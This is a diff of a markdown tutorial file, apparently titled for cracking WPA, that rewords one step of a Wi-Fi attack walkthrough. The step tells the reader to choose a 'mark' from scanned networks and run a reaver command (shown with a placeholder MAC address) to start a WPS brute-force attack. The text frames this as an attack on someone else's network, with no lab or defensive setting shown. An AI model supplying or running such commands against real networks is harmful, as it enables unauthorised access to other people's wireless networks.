fyllmax/ZeroCodingExp/CrackWPA.md

 ```
 Once airdump list all availble wifi signals around, you can move to the next step, the actual attack.

-3.After you decide which is you mark, all you need to do is to write this command with the marks mac adress in order to start the attack
+3.After you decide who is you mark, just write this command with the marks` mac adress in order to start the attack.
 ```
 reaver -i mon0 -b 00:11:22:33:44:55 -vv
 ```